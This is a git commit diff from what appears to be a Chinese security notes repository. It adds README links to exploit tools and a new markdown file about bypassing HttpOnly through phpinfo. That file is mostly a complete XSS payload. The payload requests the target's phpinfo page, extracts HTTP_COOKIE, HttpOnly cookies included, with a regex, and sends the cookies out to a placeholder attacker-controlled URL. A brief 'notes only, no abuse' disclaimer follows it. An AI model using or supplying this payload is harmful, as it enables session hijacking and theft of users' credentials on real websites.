add 通过phpinfo获取cookie突破httponly.md

2025-06-20 18:00:35 +00:00 · 2020-04-13 21:02:53 +08:00 · 2020-04-13 21:02:53 +08:00 · 3695594eb8
commit 3695594eb8
parent 78b2ebe917
2 changed files with 38 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -180,7 +180,7 @@
 - [WinRAR 代码执行漏洞 (CVE-2018-20250)-POC](https://github.com/Ridter/acefile)|[相关文章](https://research.checkpoint.com/2019/extracting-code-execution-from-winrar/)|[全网筛查 WinRAR 代码执行漏洞 (CVE-2018-20250)](https://xlab.tencent.com/cn/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/)
 - [windows10相关漏洞EXP&POC](https://github.com/nu11secur1ty/Windows10Exploits)
 - [shiro rce 反序列 命令执行 一键工具](https://github.com/wyzxxz/shiro_rce)
- [CVE-2019-1458-Win32k中的特权提升漏洞](https://github.com/unamer/CVE-2019-1458)
+- [CVE-2019-1458-Win32k中的特权提升漏洞【shell可用-Windows提取】](https://github.com/unamer/CVE-2019-1458)


 ## <span id="head7"> tools-小工具集合</span>
@ -282,6 +282,7 @@
 - [mssqli-duet-用于mssql的sql注入脚本,使用RID爆破,从Active Directory环境中提取域用户](https://github.com/Keramas/mssqli-duet)
 - [【Android脱壳】之一键提取APP敏感信息](https://github.com/TheKingOfDuck/ApkAnalyser)
 - [Shiro系列漏洞检测GUI版本-ShiroExploit GUI版本](https://github.com/feihong-cs/ShiroExploit_GUI)
+- [通过phpinfo获取cookie突破httponly](./通过phpinfo获取cookie突破httponly.md)

 ## <span id="head8"> 文章/书籍/教程相关</span>

--- a/通过phpinfo获取cookie突破httponly.md
+++ b/通过phpinfo获取cookie突破httponly.md
@ -0,0 +1,36 @@
+### `XSS`代码
+
+```javascript
+<script>
+function createXmlHttp() {
+    if (window.XMLHttpRequest) {
+       xmlHttp = new XMLHttpRequest();               
+    } else {
+       xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+    }
+}
+function getS() {
+    var Url = 'PHPinfo的地址';
+    createXmlHttp();
+    xmlHttp.onreadystatechange = writeS;
+    xmlHttp.open("GET", Url, true);
+    xmlHttp.send(null);
+}
+function writeS() {
+    if (xmlHttp.readyState == 4) {
+     var x = xmlHttp.responseText.match(/HTTP_COOKIE.+?<\/td><td.+?>([\w\W]+?)<\/td>/);
+     if (x){
+        var url = "自己收取cookie的地址" + x[1]; //x 为带httponly cookie的所有cookie
+        createXmlHttp();
+        xmlHttp.open("GET", url, true);
+        xmlHttp.send(null);  
+       }   
+    }
+}
+getS();
+</script>
+```
+
+来源：https://www.t00ls.net/thread-55915-1-1.html https://www.t00ls.net/thread-55912-1-1.html
+
+仅作笔记.禁止滥用.